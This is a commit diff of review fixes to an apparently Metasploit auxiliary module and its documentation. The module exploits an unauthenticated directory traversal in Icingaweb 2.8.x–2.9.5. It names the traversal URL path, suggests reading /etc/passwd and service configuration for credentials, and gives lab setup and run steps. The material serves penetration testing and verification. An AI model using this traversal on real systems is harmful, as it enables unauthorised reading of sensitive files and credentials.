Add in quick fixes from review

documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md

@@ -1,34 +1,42 @@
 
 ## Vulnerable Application
 
-Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
 unauthenticated directory traversal vulnerability. The vulnerability is triggered
-through the icinga-php-thirdparty library, and the file to read is an absolute path.
+through the icinga-php-thirdparty library, which allows unauthenticated users 
+to retrieve arbitrary files from the targets filesystem via a GET request to
+`/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>` as the user
+running the Icingaweb server, which will typically be the `incinga` user.
+
+This can then be used to retrieve sensitive configuration information from the target
+such as the configuration of various services, which may reveal sensitive login or configuration information,
+the `/etc/passwd` file to get a list of valid usernames for password guessing attacks, or other sensitive files 
+which may exist as part of additional functionality available on the target server.
 
 This module was tested against Icingaweb 2.9.5 running on Docker.
 
-## Install Icingaweb on Ubuntu 22.04
+## Install Icingaweb 2.9.5 on a Ubuntu 22.04 Docker Image
 
 ```
 sudo apt-get install docker.io -y
 sudo docker run -p 8080:8080 icinga/icingaweb2:2.9.5
 ```
 
-Browse to port 8080 to confirm  the site loads. No need to configure.
+Browse to port 8080 to confirm the site loads. No need to configure.
 
 ## Verification Steps
 
 1. Install the application
 2. Start msfconsole
-3. Do: `use auxiliary/scanner/http/scanner/http/icinga_static_library_file_directory_traversal`
+3. Do: `use auxiliary/scanner/http/icinga_static_library_file_directory_traversal`
 4. Do: `set rhosts [ip]`
 5. Do: `set file [file]`
 6. Do: `run`
 7. You should be able to retrieve a file
 
 ## Scenarios
 
-### Version 2.9.5 from Docker
+### Icingaweb 2.9.5 on Ubuntu 22.04 running on Docker
 
 ```
 [*] Processing icinga.rb for ERB directives.

modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb

@@ -14,9 +14,18 @@ def initialize(info = {})
         info,
         'Name' => 'Icingaweb Directory Traversal in Static Library File Requests',
         'Description' => %q{
-          Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+          Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
           unauthenticated directory traversal vulnerability. The vulnerability is triggered
-          through the icinga-php-thirdparty library, and the file to read is an absolute path.
+          through the icinga-php-thirdparty library, which allows unauthenticated users
+          to retrieve arbitrary files from the targets filesystem via a GET request to
+          /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk> as the user
+          running the Icingaweb server, which will typically be the incinga user.
+
+          This can then be used to retrieve sensitive configuration information from the target
+          such as the configuration of various services, which may reveal sensitive login
+          or configuration information, the /etc/passwd file to get a list of valid usernames
+          for password guessing attacks, or other sensitive files which may exist as part of
+          additional functionality available on the target server.
 
           This module was tested against Icingaweb 2.9.5 running on Docker.
         },
@@ -38,7 +47,7 @@ def initialize(info = {})
         ],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [],
+          'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS]
         },
         'DisclosureDate' => '2022-05-09',
@@ -49,7 +58,7 @@ def initialize(info = {})
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'The URI of the Icinga Application', '/']),
-        OptString.new('File', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
+        OptString.new('FILE', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
       ]
     )
   end
@@ -80,7 +89,7 @@ def run_host(ip)
       loot_path = store_loot('icinga file', 'text/plain', ip, res.body, datastore['FILE'])
       print_good("#{datastore['FILE']} saved to #{loot_path}")
     else
-      vprint_error('Response has 0 size.')
+      print_error('Response has 0 size.')
     end
   end
 end